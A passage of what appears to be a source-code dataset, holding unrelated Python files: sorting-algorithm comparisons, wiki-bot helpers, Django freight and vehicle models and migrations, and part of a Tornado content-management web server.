return {'__tuple__': True, 'items': item}
if isinstance(item, list):
return [hint_tuples(e) for e in item]
if isinstance(item, dict):
return {key: hint_tuples(value) for key, value in item.items()}
return item
return super(MultiDimensionalArrayEncoder, self).encode(hint_tuples(obj))
def hinted_tuple_hook(obj):
"""
This hook can be passed to json.load* as a object_hook. Assuming the incoming
JSON string is from the MultiDimensionalArrayEncoder, tuples are marked
and then reconstructed into tuples from dictionaries.
Args:
obj (object): Object to be parsed
Returns:
object: Object (if it's a tuple dictionary, returns a tuple)
"""
if '__tuple__' in obj:
return tuple(obj['items'])
return obj
def cancel_async_tasks():
"""
Cancels pending tasks and closes the IO loop, which is needed in Python 3.
This method is provided for Py2 compatibility and just closes the loop
"""
tornado.ioloop.IOLoop.instance().stop()
|
999,330 | 2b0574b78cf373cf83da044adc9027dc88de5cfe | input()
s = input()
while s != "___________":
s = s[2:-1]
tmp = 64
tmp2 = 0
for c in s:
if c == "o":
tmp2 += tmp
tmp //= 2
if c == ".":
tmp *= 2
# print(tmp2)
print(chr(tmp2),end="")
s = input() |
999,331 | d743f6f3174e0d4e6a9f08ddc8e1bf3679404658 | import numpy as np
class item():
def __init__(self, row_length, row1, row2, result):
self.row1 = row1
self.row2 = row2
self.id = row_length*row1 + row2
self.result = np.array(result)
|
999,332 | bdcb77b7b75a8d0ad8b2c440d06e8d634b2bc5b8 | from pie.main import entry_point
__author__ = 'sery0ga'
#from rpython.jit.codewriter.policy import JitPolicy
def target(driver, args):
driver.exe_name = 'pie'
return entry_point, None
def jitpolicy(driver):
from rpython.jit.codewriter.policy import JitPolicy
return JitPolicy()
|
999,333 | 819d221cbae580f13071cabf0c98317418aa084b | from random import choice
# These variables are used to count the comparisons
# They are accessed globally in each sort function
quickComparisons = 0
mergeComparisons = 0
selectionComparisons = 0
insertionComparisons = 0
def swap(Arr, j, i):
tempVar = Arr[j]
Arr[j] = Arr[i]
Arr[i] = tempVar
return(Arr)
def selectionSort(A):
global selectionComparisons # Used to count the number of comparisons
n = len(A)
for q in range(0, n-1):
smallPos = q
for x in range(q+1, n):
# Increments comparisons each time one is done, it is before
# the inequality, because the inequality may not always be true.
selectionComparisons += 1
if A[x] < A[smallPos]:
smallPos = x
A = swap(A,q,smallPos) # Calls the swap function
return(A) # Returns tuple of the sorted list and # of comps
def merge(left, right):
global mergeComparisons
sortedList=[] # Array used to store the sorted list
i,j=0,0
while i<len(left) and j<len(right): # Ensures we dont go out of list
mergeComparisons +=1
if left[i] < right[j]: # Comparing the unitary lists
sortedList.append(left[i])
i+=1 # Moves to next element in list
else:
sortedList.append(right[j])
j+=1
sortedList+=left[i:]
sortedList+=right[j:]
return (sortedList)
def mergeSort(A):
n = len(A)
if (n <= 1):
return(A)
splitPoint = int(n/2)
# Defines left as a list with everything up to the splitpoint
left = mergeSort(A[:splitPoint])
right = mergeSort(A[splitPoint:])
return(merge(left,right))
def insertionSort(A):
global insertionComparisons # Comparison global variable access
for i in range(0,len(A)):
key = A[i]
j = i-1
while j>=0 and key < A[j]: # Waits until key is greater than A[j]
insertionComparisons +=1
A[j+1] = A[j]
j -= 1
A[j+1] = key # Inserts the value
return(A)
def quickSort(A):
global quickComparisons
left = []
pivotList = []
right = []
if (len(A) <= 1):
return(A)
else:
pivotPoint = choice(A)
# The block below iterates over the lists and
#chooses which partition values belong in
for i in A:
quickComparisons +=2
if i < pivotPoint:
left.append(i)
elif i > pivotPoint:
right.append(i)
else:
pivotList.append(i)
leftSide = quickSort(left)
rightSide = quickSort(right)
return(leftSide + pivotList + rightSide)
def main():
# Reads magicitems file
f = open('magicitems.txt',"r")
magicitems = list(f)
f.close
magicitems = [x.strip() for x in magicitems]
magicitems = [x.lower() for x in magicitems]
magicitems = [x.replace(' ','') for x in magicitems]
a= magicitems
b= magicitems
sortingCalls =[insertionSort, selectionSort, mergeSort, quickSort]
for algorithm in sortingCalls:
algorithm.__call__(a)
# QuickSort must be last because quickSort sorts in place!
print("---------------------------------------------")
print("Sorting Algorithm | Comparisons ")
print("-------------------|-------------------------")
print("Insertion Sort: "," | ", insertionComparisons)
print("Quick Sort: "," | ", quickComparisons)
print("Merge Sort: "," | ", mergeComparisons)
print("Selection Sort:"," | ", selectionComparisons)
print("---------------------------------------------")
main()
|
999,334 | 46c55ac1e272f0d8bd2ed41d543c0dc69f0e73ea | #!usr/bin/python
#
# (C) Legoktm 2008-2011, MIT License
#
import wikipedia, pagegenerators, catlib
import re, sys
from wikipedia import *
#status updater
#syntax: legoktm.newstatus("Status", "User:Username/Status", "[y]es/[n]o prompt)
site = wikipedia.getSite()
def newstatus(status, page, prompt):
site = wikipedia.getSite()
statuspage = wikipedia.Page(site, page)
print "Current status is " + statuspage.get()
if statuspage.get() != status:
if prompt == "y":
ask = raw_input("Should we update your status to " + status + "? [y]es, [n]o ")
if ask == "y":
summary = 'Updating my status'
statuspage.put(status, summary)
else:
summary = 'Updating my status'
statuspage.put(status, summary)
else:
print "Don't have to update status,\nas it already is " + status
#shortcut for raw_input()
#syntax: legoktm.ri(text)
def ri(text):
return raw_input(text)
#uploads source code to wiki
#variables: wikipage=page to upload code to and code=file code is in
#syntax: legoktm.upload(wikipage, code)
def upload(wikipage, code):
prompt = raw_input("Should we update the code? [y]es, [n]o " )
if prompt == "y":
summary = 'Updating source'
scriptpage = wikipedia.Page(site, wikipage)
file = open(code, 'r')
text = file.read()
file.close()
text = '<source lang="python">\n' + text + '</sou' + 'rce>' # Split to confuse MW parser
if scriptpage.get() != text:
scriptpage.put(text, summary)
else:
print "Source not updated"
#adds certain text to a log page
#syntax: leogktm.log(pagecreated, logpage, newtext)
#input newtext as a variable
def log(page, log, newtext):
logpage = Page(site, log)
newtext = newtext + logpage.get()
summary = 'Adding ' + page + ' to log'
print summary
logpage.put(newtext, summary)
print "Done adding " + page + " to log."
#converts number to month
#needs to use a variable
#syntax: legoktm.month(var, newvar)
def month(var):
if var == "1":
var = "January"
elif var == "2":
var = "February"
elif var == "3":
var = "March"
elif var == "4":
var = "April"
elif var == "5":
var = "May"
elif var == "6":
var = "June"
elif var == "7":
var = "July"
elif var == "8":
var = "August"
elif var == "9":
var = "September"
elif var == "10":
var = "October"
elif var == "11":
var = "November"
elif var == "12":
var = "December"
else:
print "Their is no month with the number of " + var
print var
return var
#checks if a certain page exists, if it does, wikilink it
#syntax: legoktm.pagecheck("pagename")
def pagecheck(name):
site = wikipedia.getSite()
wppage = wikipedia.Page(site, name)
if wppage.exists() == True:
name = "[[" + name + "]]"
print name + " exists."
else:
print name + "does not exist."
return name
#unicodify
def unicodify(text):
if not isinstance(text, unicode):
return text.decode('utf-8')
return text
def wikilink(link):
link = "[[" + link + "]]"
return link
def delink(link):
import re
link = re.compile(r'\[\[(.*?)\]\]', re.IGNORECASE).sub(r'\1', str(link))
return link
def templink(link):
link = '{{' + link + '}}'
return link
def delinktemp(link):
import re
link = re.compile(r'\{\{(.*?)\}\}', re.IGNORECASE).sub(r'\1', str(link))
return link
def addsection(page, content, summary):
site = wikipedia.getSite()
wppage = wikipedia.Page(site, page)
text = wppage.get()
text = text + content
wikipedia.showDiff(wppage.get(), text)
try:
page.put(text, summary, minorEdit=False)
except wikipedia.NoPage:
page.put(text, summary, minorEdit=False)
except wikipedia.IsRedirectPage:
return
except, e:
print "ERROR: Except was raised during writing"
print e
sys.exit()
|
999,335 | 49963945d07369c6f69ace5648b9d6da99edee62 | # Generated by Django 3.0.3 on 2020-10-05 05:35
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('agreement', '0028_localarea'),
]
operations = [
migrations.AlterField(
model_name='site',
name='site_extension',
field=models.IntegerField(blank=True, max_length=20),
),
]
|
999,336 | acdfd063629a221fbed1df8e95840be7ce994133 | """ This is a simple programme on Classes
and Objects : Initializer Method in Py3"""
class Point:
def __init__(self, x, y, z):
self.assign(x, y, z)
def assign(self, x, y, z):
self.x = x
self.y = y
self.z = z
def printPoint(self):
print(self.x, self.y, self.z)
p1 = Point(2, 3, 5)
p1.printPoint()
p2 = Point(6, 2, -4)
p2.printPoint()
# It's Output is :
# 2 3 5
# 6 2 -4
|
999,337 | 37d093a9d1d3e7a63c66c4fa4ee396f04d4485e5 | from django.db import models
from django.db.models import DEFERRED
from django.contrib.auth.models import User
from django_countries.fields import CountryField
class FreightCompany(models.Model):
def __str__(self):
return self.name
@classmethod
def from_db(cls, db, field_names, values):
# Default implementation of from_db() (subject to change and could
# be replaced with super()).
if len(values) != len(cls._meta.concrete_fields):
values = list(values)
values.reverse()
values = [
values.pop() if f.attname in field_names else DEFERRED
for f in cls._meta.concrete_fields
]
instance = cls(*values)
instance._state.adding = False
instance._state.db = db
# customization to store the original field values on the instance
instance._loaded_values = dict(zip(field_names, values))
return instance
id = models.AutoField(primary_key=True)
name = models.CharField(max_length=20, default='')
location = models.CharField(max_length=100, default='')
FREIGHT_TYPES = (('AIR', 'Air-Freight'),
('ROAD', 'Road-Freight'),
('RAIL', 'Railway-Freight'),
('SHIP', 'Sea-Freight'),
)
type = models.CharField(choices=FREIGHT_TYPES, default='', max_length=100)
owner = models.ForeignKey(User, related_name='freightcompany', on_delete=models.SET_NULL, null=True, blank=True)
has_own_vehicles = models.BooleanField(default=True)
text = 'To select multiple destinations. Hold CTRL!'
rating = models.PositiveSmallIntegerField(blank=True, null=True)
destinations = CountryField(multiple=True, blank_label='(select country)', blank=True, help_text=text)
revenue = models.PositiveIntegerField()
founding_year = models.DateField(help_text='Date Format=1920-2-10')
logo = models.ImageField
class ManagerAirFreight(models.Manager):
def save(self, *args, **kwargs):
if not self._state.adding and (
self.type != self._loaded_values['type']):
raise ValueError("Updating type is not allowed")
super().save(*args, **kwargs)
def get_queryset(self):
return super(ManagerAirFreight, self).get_queryset().filter(
type='AIR')
class ManagerRoadFreight(models.Manager):
def save(self, *args, **kwargs):
if not self._state.adding and (
self.type != self._loaded_values['type']):
raise ValueError("Updating type is not allowed")
super().save(*args, **kwargs)
def get_queryset(self):
return super(ManagerRoadFreight, self).get_queryset().filter(
type='ROAD')
class ManagerRailwayFreight(models.Manager):
def save(self, *args, **kwargs):
if not self._state.adding and (
self.type != self._loaded_values['type']):
raise ValueError("Updating type is not allowed")
super().save(*args, **kwargs)
def get_queryset(self):
return super(ManagerRailwayFreight, self).get_queryset().filter(
type='RAIL')
class ManagerSeaFreight(models.Manager):
def save(self, *args, **kwargs):
if not self._state.adding and (
self.type != self._loaded_values['type']):
raise ValueError("Updating type is not allowed")
super().save(*args, **kwargs)
def get_queryset(self):
return super(ManagerSeaFreight, self).get_queryset().filter(
type='SHIP')
class AirFreightCompany(FreightCompany):
objects = ManagerAirFreight()
class Meta:
proxy = True
class RoadFreightCompany(FreightCompany):
objects = ManagerRoadFreight()
class Meta:
proxy = True
class RailwayFreightCompany(FreightCompany):
objects = ManagerRailwayFreight()
class Meta:
proxy = True
class SeaFreightCompany(FreightCompany):
objects = ManagerSeaFreight()
class Meta:
proxy = True
class Vehicle(models.Model):
def __str__(self):
return self.name
@classmethod
def from_db(cls, db, field_names, values):
# Default implementation of from_db() (subject to change and could
# be replaced with super()).
if len(values) != len(cls._meta.concrete_fields):
values = list(values)
values.reverse()
values = [
values.pop() if f.attname in field_names else DEFERRED
for f in cls._meta.concrete_fields
]
instance = cls(*values)
instance._state.adding = False
instance._state.db = db
# customization to store the original field values on the instance
instance._loaded_values = dict(zip(field_names, values))
return instance
VEHICLE_TYPES = (('ROAD', 'Truck'),
('AIR', 'Airplane'),
('RAIL', 'Train'),
('SEA', 'Ship'),
)
types = models.CharField(choices=VEHICLE_TYPES, default='', max_length=100)
name = models.CharField(default='', max_length=100)
occupied = models.BooleanField(default=False)
location = models.CharField(default='', max_length=200)
donedate = models.DateField(default='1980-02-01')
builtdate = models.DateField(default='1980-02-01')
length = models.PositiveSmallIntegerField(null=True)
maxWeight = models.PositiveIntegerField(default=100)
owner = models.ForeignKey(User,related_name='vehicles', on_delete=models.SET_NULL, null=True, blank=True)
driver = models.ForeignKey('Driver', related_name='driver', on_delete=models.SET_NULL, null=True, blank=True)
goods = models.CharField(max_length=10, blank=True)
class ManagerPlane(models.Manager):
def save(self, *args, **kwargs):
if not self._state.adding and (
self.types != self._loaded_values['types']):
raise ValueError("Updating type is not allowed")
super().save(*args, **kwargs)
def get_queryset(self):
return super(ManagerPlane, self).get_queryset().filter(
types='AIR')
def create(self, **kwargs):
kwargs.update({'types': 'AIR'})
return super(ManagerPlane, self).create(**kwargs)
class ManagerTruck(models.Manager):
def save(self, *args, **kwargs):
if not self._state.adding and (
self.types != self._loaded_values['types']):
raise ValueError("Updating type is not allowed")
super().save(*args, **kwargs)
def get_queryset(self):
return super(ManagerTruck, self).get_queryset().filter(
types='ROAD')
def create(self, **kwargs):
kwargs.update({'types': 'ROAD'})
return super(ManagerTruck, self).create(**kwargs)
class ManagerTrain(models.Manager):
def save(self, *args, **kwargs):
if not self._state.adding and (
self.types != self._loaded_values['types']):
raise ValueError("Updating type is not allowed")
super().save(*args, **kwargs)
def get_queryset(self):
return super(ManagerTrain, self).get_queryset().filter(
types='RAIL')
def create(self, **kwargs):
kwargs.update({'types': 'RAIL'})
return super(ManagerTrain, self).create(**kwargs)
class ManagerShip(models.Manager):
def save(self, *args, **kwargs):
if not self._state.adding and (
self.types != self._loaded_values['types']):
raise ValueError("Updating type is not allowed")
super().save(*args, **kwargs)
def get_queryset(self):
return super(ManagerShip, self).get_queryset().filter(
types='Ship')
def create(self, **kwargs):
kwargs.update({'types': 'Ship'})
return super(ManagerShip, self).create(**kwargs)
class Train(Vehicle):
objects = ManagerTrain()
company = models.ForeignKey(RailwayFreightCompany, on_delete=models.CASCADE, default='')
features = models.ManyToManyField('Features', limit_choices_to={'vehicle': 'RAIL'})
permissions = models.ManyToManyField('Permissions', limit_choices_to={'vehicle': 'RAIL'}, related_name='+')
class Plane(Vehicle):
objects = ManagerPlane()
company = models.ForeignKey(AirFreightCompany, on_delete=models.CASCADE, default='')
features = models.ManyToManyField('Features', limit_choices_to={'vehicle': 'AIR'})
permissions = models.ManyToManyField('Permissions', limit_choices_to={'vehicle': 'AIR'},related_name='+')
class Ship(Vehicle):
objects = ManagerShip()
company = models.ForeignKey(SeaFreightCompany, on_delete=models.CASCADE, default='')
features = models.ManyToManyField('Features', limit_choices_to={'vehicle': 'SEA'})
permissions = models.ManyToManyField('Permissions', limit_choices_to={'vehicle': 'SEA'}, related_name='+')
class Truck(Vehicle):
objects = ManagerTruck()
licenseplate = models.CharField(max_length=10)
km_driven = models.PositiveIntegerField()
permission_until = models.DateField()
emission_class = models.CharField(max_length=5)
company = models.ForeignKey(RoadFreightCompany, on_delete=models.CASCADE, default='')
features = models.ManyToManyField('Features', limit_choices_to={'vehicle': 'ROAD'})
permissions = models.ManyToManyField('Permissions', limit_choices_to={'vehicle': 'ROAD'}, related_name='+')
class Features(models.Model):
def __str__(self):
return self.name
VEHICLE_TYPES = (('ROAD', 'Truck'),
('AIR', 'Airplane'),
('RAIL', 'Train'),
('SEA', 'Ship'),
)
vehicle = models.CharField(choices=VEHICLE_TYPES, default='', max_length=100)
name = models.CharField(max_length=100, default='')
description = models.TextField(max_length=100, blank=True)
class Permissions(Features):
class Meta:
proxy = True
class Driver(models.Model):
def __str__(self):
return self.name
id = models.AutoField(primary_key=True)
company = models.ForeignKey(FreightCompany, on_delete=models.CASCADE, default='')
name = models.CharField(max_length=200)
gebd_dat = models.DateField()
rating = models.PositiveSmallIntegerField()
driving_license_classes = models.CharField(max_length=250)
work_experience = models.PositiveSmallIntegerField()
available = models.BooleanField(default=True)
|
999,338 | 92dc6e9f3e6bd324c2d50376d531d02e80a2061c | # Generated by Django 2.1.3 on 2018-11-22 09:01
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('exchange', '0001_initial'),
('simulation', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Portfolio',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('start_date', models.DateField()),
('end_date', models.DateField(blank=True, null=True)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='WeightPortfolio',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('weight', models.PositiveIntegerField(default=1)),
('portfolio', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='simulation.Portfolio')),
('ticker', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='exchange.Ticker')),
],
),
migrations.AddField(
model_name='portfolio',
name='tickers',
field=models.ManyToManyField(through='simulation.WeightPortfolio', to='exchange.Ticker'),
),
]
|
999,339 | 1d592de64d6925892483627a5eed54cfb3a4d9a5 | '''
cms : content manager system
manager group
manager account
manager message
'''
from __future__ import absolute_import, division, print_function, with_statement
# Tornado framework
import tornado.web
HTTPError = tornado.web.HTTPError
import tornado.ioloop
import tornado.auth
import tornado.escape
import tornado.options
import tornado.locale
import tornado.util
import tornado.httpclient
import tornado.gen
import tornado.httputil
from tornado.util import errno_from_exception
from tornado.platform.auto import set_close_exec
from tornado.options import define, options
define('port', default=8180, help='running on the given port', type=int)
import errno
import os
import sys
# import re
# import struct
# import hashlib
import socket
# import collections
import functools
# import time
# import datetime
import logging
# import xml.etree.ElementTree as ET
# Mako template
import mako.lookup
import mako.template
# from MySQLdb import (IntegrityError)
import user_agents
logger = None
import util
_now = util.now
import settings
import manage
import ueditor_config
# json_encoder = util.json_encoder
json_encoder = util.json_encoder2
json_decoder = util.json_decoder
CURRENT_PATH = os.path.abspath(os.path.dirname(__file__))
TEMPLATE_PATH = settings['cms_path']
if not os.path.exists(TEMPLATE_PATH):
os.mkdir(TEMPLATE_PATH)
# if IMAGE_PATH not existed, mkdir it
UPLOAD_IMAGE_PATH = os.path.join(TEMPLATE_PATH, 'fu_images')
UF_IMAGE_PREFIX = '/fu_images/'
if not os.path.exists(UPLOAD_IMAGE_PATH):
os.mkdir(UPLOAD_IMAGE_PATH)
# MOBILE_PATH = os.path.join(TEMPLATE_PATH, 'm')
UEDITOR_IMAGE_PATH = os.path.join(TEMPLATE_PATH, 'ue_images')
UE_IMAGE_PREFIX = '/ue_images/'
OK = {'Code':200, 'Msg':'OK'}
_GROUPS_ = {}
# _SECTION_ = {}
class Application(tornado.web.Application):
'''
Web application class.
Redefine __init__ method.
'''
def __init__(self):
handlers = [
(r'/account', AccountHandler),
(r'/manager/?(.*)$', ManagerHandler),
# group interface
(r'/group/?(.*)$', GroupsHandler),
# message interface
(r'/message/section/?(.*)$', SectionHandler),
(r'/message/?(.*)$', MessageHandler),
#
(r'/ue$', UeditorHandler),
# static resource handler
# add support for php
(r'/(.*\.(?:css|jpg|png|js|ico|json|php|gif|swf))$', tornado.web.StaticFileHandler,
{'path':TEMPLATE_PATH}),
(r'/image/?(.*)$', ImageHandler),
(r'/index.html', MainHandler),
(r'/(.+\.html)', PageHandler),
(r'/', MainHandler),
]
settings = {
'cookie_secret':util.sha1('bidong').hexdigest(),
'static_path':TEMPLATE_PATH,
'static_url_prefix':'images/',
'debug':False,
'autoreload':True,
'autoescape':'xhtml_escape',
'i18n_path':os.path.join(CURRENT_PATH, 'resource/i18n'),
# 'login_url':'',
'xheaders':True, # use headers like X-Real-IP to get the user's IP address instead of
# attributeing all traffic to the balancer's IP address.
}
super(Application, self).__init__(handlers, **settings)
class BaseHandler(tornado.web.RequestHandler):
'''
BaseHandler
override class method to adapt special demands
'''
LOOK_UP = mako.lookup.TemplateLookup(directories=[TEMPLATE_PATH, ],
module_directory='/tmp/cms/mako',
output_encoding='utf-8',
input_encoding='utf-8',
encoding_errors='replace')
# LOOK_UP_MOBILE = mako.lookup.TemplateLookup(directories=[MOBILE_PATH, ],
# module_directory='/tmp/bidong/mako_mobile',
# output_encoding='utf-8',
# input_encoding='utf-8',
# encoding_errors='replace')
RESPONSES = {}
RESPONSES.update(tornado.httputil.responses)
def initialize(self):
'''
'''
pass
# def on_finish(self):
# '''
# allow other sites access this site
# '''
# self.set_header('Access-Control-Allow-Origin', '*')
def get_arguments(self, name, strip=True):
assert isinstance(strip, bool)
return self._get_arguments(name, self.request.arguments, strip)
def _get_arguments(self, name, source, strip=True):
values = []
for v in source.get(name, []):
if isinstance(v, basestring):
v = self.decode_argument(v, name=name)
if isinstance(v, tornado.escape.unicode_type):
v = tornado.web.RequestHandler._remove_control_chars_regex.sub(' ', v)
if strip:
v = v.strip()
values.append(v)
return values
def render_string(self, filename, **kwargs):
'''
Override render_string to use mako template.
Like tornado render_string method, this method also
pass request handler environment to template engine
'''
try:
# if not self.is_mobile():
template = self.LOOK_UP.get_template(filename)
# else:
# template = self.LOOK_UP_MOBILE.get_template(filename)
env_kwargs = dict(
handler = self,
request = self.request,
# current_user = self.current_user
locale = self.locale,
_ = self.locale.translate,
static_url = self.static_url,
xsrf_form_html = self.xsrf_form_html,
reverse_url = self.application.reverse_url,
)
env_kwargs.update(kwargs)
return template.render(**env_kwargs)
except:
from mako.exceptions import RichTraceback
tb = RichTraceback()
for (module_name, line_no, function_name, line) in tb.traceback:
print('File:{}, Line:{} in {}'.format(module_name, line_no, function_name))
print(line)
logger.error('Render {} failed, {}:{}'.format(filename, tb.error.__class__.__name__, tb.error),
exc_info=True)
raise HTTPError(500, 'Render page failed')
def render(self, filename, **kwargs):
'''
Render the template with the given arguments
'''
template = TEMPLATE_PATH
# if self.is_mobile():
# template = MOBILE_PATH
if not os.path.exists(os.path.join(template, filename)):
raise HTTPError(404, 'File Not Found')
self.finish(self.render_string(filename, **kwargs))
def set_status(self, status_code, reason=None):
'''
Set custom error resson
'''
self._status_code = status_code
self._reason = 'Unknown Error'
if reason is not None:
self._reason = tornado.escape.native_str(reason)
else:
try:
self._reason = self.RESPONSES[status_code]
except KeyError:
raise ValueError('Unknown status code {}'.format(status_code))
def write_error(self, status_code, **kwargs):
'''
Customer error return format
'''
if self.settings.get('Debug') and 'exc_info' in kwargs:
self.set_header('Content-Type', 'text/plain')
import traceback
for line in traceback.format_exception(*kwargs['exc_info']):
self.write(line)
self.finish()
else:
self.render_json_response(Code=status_code, Msg=self._reason)
# self.render('error.html', Code=status_code, Msg=self._reason)
def render_json_response(self, **kwargs):
'''
Encode dict and return response to client
'''
# self.set_header('Access-Control-Allow-Origin', '*')
origin = self.request.headers.get('Origin', '')
if origin and origin in settings['sites']:
self.set_header('Access-Control-Allow-Origin', origin)
callback = self.get_argument('callback', None)
# check should return jsonp
if callback:
self.set_status(200, kwargs.get('Msg', None))
self.finish('{}({})'.format(callback, json_encoder(kwargs)))
else:
self.set_status(kwargs['Code'], kwargs.get('Msg', None))
self.set_header('Content-Type', 'application/json')
self.finish(json_encoder(kwargs))
def is_mobile(self):
self.agent_str = self.request.headers.get('User-Agent', '')
if not self.agent_str:
return False
if 'MicroMessenger' in self.agent_str:
# from weixin client
return True
self.check_app()
if hasattr(self, 'is_mobile'):
return self.is_mobile
agent = user_agents.parse(self.agent_str)
return agent.is_mobile
def check_app(self):
'''
'''
name = '\xe8\x87\xaa\xe8\xb4\xb8\xe9\x80\x9a'
if name in self.agent_str:
self.is_mobile = True
# if self.agent_str.find('Android'):
# self.agent['os'] = 'Android'
# else:
# self.agent['os'] = 'IOS'
def _parse_body(method):
'''
Framework only parse body content as arguments
like request POST, PUT method.
Through this method parameters can be send in uri or
in body not matter request methods(contain 'GET', 'DELETE')
'''
@functools.wraps(method)
def wrapper(self, *args, **kwargs):
content_type = self.request.headers.get('Content-Type', '')
# parse json format arguments in request body content
if content_type.startswith('application/json') and self.request.body:
arguments = json_decoder(tornado.escape.native_str(self.request.body))
for name, values in arguments.iteritems():
self.request.arguments.setdefault(name, []).extend([values,])
# if isinstance(values, basestring):
# values = [values, ]
# elif isinstance(values, dict):
# values = [values, ]
# else:
# values = [v for v in values if v]
# if values:
# self.request.arguments.setdefault(name, []).extend(values)
# parse body if request's method not in (PUT, POST, PATCH)
if self.request.method not in ('PUT', 'PATCH', 'POST'):
if content_type.startswith('application/x-www-form-urlencode'):
arguments = tornado.escape.parse_qs_bytes(
tornado.escape.native_str(self.request.body))
for name, values in arguments.iteritems():
values = [v for v in values if v]
if values:
self.request.arguments.setdefault(name, []).extend(values)
elif content_type.startswith('multipart/form-data'):
fields = content_type.split(';')
for field in fields:
k, sep, v = field.strip().partition('=')
if k == 'boundary' and v:
tornado.httputil.parse_multipart_form_data(
tornado.escape.utf8(v), self.request.body,
self.request.arguments, self.request.files)
break
else:
logger.warning('Invalid multipart/form-data')
return method(self, *args, **kwargs)
return wrapper
def _trace_wrapper(method):
'''
Decorate method to trace logging and exception.
Remarks : to make sure except catch and progress record
_trace_wrapper should be the first decorator if a method
is decorated by multiple decorators.
'''
@functools.wraps(method)
def wrapper(self, *args, **kwargs):
try:
logger.info('<-- In %s: <%s> -->', self.__class__.__name__, self.request.method)
return method(self, *args, **kwargs)
except HTTPError:
logger.error('HTTPError catch', exc_info=True)
raise
except KeyError:
if self.application.settings.get('debug', False):
print(self.request)
logger.warning('Arguments error', exc_info=True)
raise HTTPError(400)
except ValueError:
if self.application.settings.get('debug', False):
print(self.request)
logger.warning('Arguments value abnormal', exc_info=True)
raise HTTPError(400)
except Exception:
# Only catch normal exceptions
# exclude SystemExit, KeyboardInterrupt, GeneratorExit
logger.error('Unknow error', exc_info=True)
raise HTTPError(500)
finally:
logger.info('<-- Out %s: <%s> -->\n\n', self.__class__.__name__, self.request.method)
return wrapper
def _check_token(method):
'''
check user & token
'''
@functools.wraps(method)
def wrapper(self, *args, **kwargs):
user = self.get_argument('manager')
if not user:
raise HTTPError(400, reason='account can\'t be null')
token = self.get_argument('token')
token, expired = token.split('|')
token2 = util.token2(user, expired)
if token != token2:
raise HTTPError(400, reason='Abnormal token')
# check expired?
return method(self, *args, **kwargs)
return wrapper
def _check_groups_(user):
'''
If user in _GROUPS_ return it's group values
else not in, query
if existed, return group
else:
raise 404
'''
if user in _GROUPS_:
return _GROUPS_[user]
# query group info
manager = manage.get_manager(user)
if not manager:
raise HTTPError(404, reason='Can\'t found manager')
groups = int(manager['groups'])
_GROUPS_[user] = groups
return groups
# def _check_section_(value):
# '''
# reponse
# '''
# value = int(value)
# if value in _SECTION_:
# return _SECTION_[value]
#
# section = manage.get_section(value)
# if not section:
# return 'Unknown'
#
# _SECTION_[value] = section['name']
# return section['name']
class MainHandler(BaseHandler):
'''
'''
@_trace_wrapper
def get(self):
manager = self.get_argument('manager', '')
if manager:
token = self.get_argument('token')
token, expired = token.split('|')
token2 = util.token2(manager, expired)
if token != token2:
raise HTTPError(400, reason='Abnormal token')
self.render('index.html', groups=_check_groups_(manager))
else:
self.redirect('login.html')
class PageHandler(BaseHandler):
'''
'''
@_trace_wrapper
@_parse_body
def get(self, page):
'''
Render html page
'''
page = page.lower()
# logger.info('argument:{}'.format(self.request.arguments))
# if not page.endswith('.html'):
# page = page + '.html'
# if page.startswith('manager.html'):
# return self.render('login_admin.html')
manager = self.get_argument('manager', '')
if manager:
# manager get it's messages
token = self.get_argument('token')
token, expired = token.split('|')
token2 = util.token2(manager, expired)
if token != token2:
raise HTTPError(400, reason='Abnormal token')
self.render(page, groups=_check_groups_(manager))
else:
# if page in ('newsdetail.html',) and self.is_mobile():
# _id = self.get_argument('id')
# message = manage.get_message(_id)
# if message:
# self.render('m_message.tmpt', **message)
return self.render(page)
class ManagerHandler(BaseHandler):
'''
api/manager/*
maintain administrator account
'''
def _check_admin_(self):
manager = self.get_argument('manager')
if _check_groups_(manager) != 1000:
raise HTTPError(403, reason='Not administrator account')
@_trace_wrapper
@_parse_body
@_check_token
def get(self, user=''):
# user = self.get_argument('manager')
if user:
manager = manage.get_manager(user)
if not manager:
raise HTTPError(404, reason='Can\'t found manager')
self.render_json_response(Code=200, Msg='OK', manager=manager)
else:
managers = manage.get_managers()
self.render_json_response(Code=200, Msg='OK', managers=managers)
@_trace_wrapper
@_parse_body
@_check_token
def post(self, user=''):
'''
add new manager account
'''
self._check_admin_()
# user = self.get_argument('manager', '') or self.get_argument('user', '')
kwargs = {}
kwargs['user'] = self.get_argument('user')
kwargs['mask'] = int(self.get_argument('mask', 0))
kwargs['password'] = self.get_argument('password', '')
kwargs['groups'] = int(self.get_argument('groups'))
manage.create_manager(**kwargs)
self.render_json_response(Code=200, Msg='OK')
@_trace_wrapper
@_parse_body
@_check_token
def put(self, user):
'''
update manager account
'''
self._check_admin_()
# user = self.get_argument('manager')
kwargs = {key:value[0] for key,value in self.request.arguments.iteritems()}
kwargs.pop('token')
kwargs.pop('manager')
if 'groups' in kwargs:
kwargs['groups'] = int(kwargs['groups'])
manage.update_manager(user, **kwargs)
self.render_json_response(**OK)
@_trace_wrapper
@_parse_body
@_check_token
def delete(self, user):
'''
delete manager account
'''
self._check_admin_()
# user = self.get_argument('user')
manage.delete_manager(user)
self.render_json_response(**OK)
class GroupsHandler(BaseHandler):
'''
manager groups
'''
@_trace_wrapper
@_parse_body
@_check_token
def get(self, _id=None):
'''
get groups or special group details
'''
if _id:
# get special group
record = manage.get_group(_id)
return self.render_json_response(Code=200, Msg='OK', group=record)
else:
records= manage.get_groups()
return self.render_json_response(Code=200, Msg='OK', groups=records)
@_trace_wrapper
@_parse_body
@_check_token
def post(self, _id=None):
'''
create new groups
'''
name = self.get_argument('name')
note = self.get_argument('note')
print(name, note)
manage.create_group(name, note)
self.render_json_response(Code=200, Msg='OK')
class GMTypeHandler(BaseHandler):
@_trace_wrapper
@_parse_body
@_check_token
def get(self, _id=''):
manager = self.get_argument('manager')
group = _check_groups_(manager)
if _id:
gmtype = manage.get_gmtype(group, _id)
else:
